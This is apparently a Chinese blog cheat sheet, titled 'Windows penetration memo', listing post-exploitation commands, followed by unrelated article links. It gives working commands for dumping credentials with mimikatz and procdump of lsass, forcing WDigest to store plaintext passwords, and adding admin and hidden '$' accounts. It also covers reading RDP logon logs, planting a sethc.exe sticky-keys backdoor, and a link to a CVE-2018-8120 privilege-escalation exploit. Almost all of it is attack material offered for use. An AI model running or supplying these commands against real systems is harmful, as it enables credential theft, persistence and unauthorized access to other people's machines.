Windows渗透备忘录
2024-09-06 16:47:41
Windows渗透备忘录
mimikatz
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
procdump64.exe导出lsass.dmp
先用procdump64.exe导出lsass.dmp
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
命令执行完成之后,会有提示下载路径。
然后把 lsass.dmp 下载到本地(实战中可以从菜刀下载或者网站访问下载等等)
使用本地的mimikatz.exe读取lsass.dmp。
修改注册表保存明文
但是我们可以通过修改注册表来让Wdigest Auth保存明文口令:
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
添加用户
net user cmc Nqpqsnm123 /add
net localgroup administrators cmc /add
net user cmc$ Nqpqsnm123 /add
查看rdp端口
tasklist /svc | findstr "TermService"
netstat -ano
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
3389记录获取:wevtutil.exe qe security "/q:*[System [(EventID=4624)]]"/f:text /rd:true /c:100 > c:\sys.txt 100是条数
Shift后门
替换system32下的sethc.exe为cmd.exe
关闭远程桌面的
使用Kali rdesktop
创建注册表隐藏用户
https://blog.csdn.net/abcd51685168/article/details/41854981
提权工具
2018-8120
https://github.com/unamer/CVE-2018-8120
最新文章
- 烂泥:学习Nagios(三): NRPE安装及配置
- [转] Spring注解@Component、@Repository、@Service、@Controller区别
- GMM简单解释
- maven总结1
- Myeclipse 60.激活
- sublime3使用
- Prince2七大原则(3)
- 前端资源多个产品整站一键打包&包版本管理(二)——如何在bower的配置文件加上注释
- LR实战之Discuz开源论坛——登录场景设计
- BZOJ 1597: [Usaco2008 Mar]土地购买( dp + 斜率优化 )
- vue中父子组件的通信
- 在koa中想要优雅的发送响应?看这就对了
- logging模板日志格式
- 怎么在VS监视DataSet类型的数据
- 三:Bootstrap-js插件
- 如何手玩5h uoj215 果冻运输得到 AC
- vue 音乐播放器报错
- Elasticsearch6.4.3安装
- PostgreSQL 务实应用(四/5)JSON
- jquery checkbox点击选中,再点击取消选中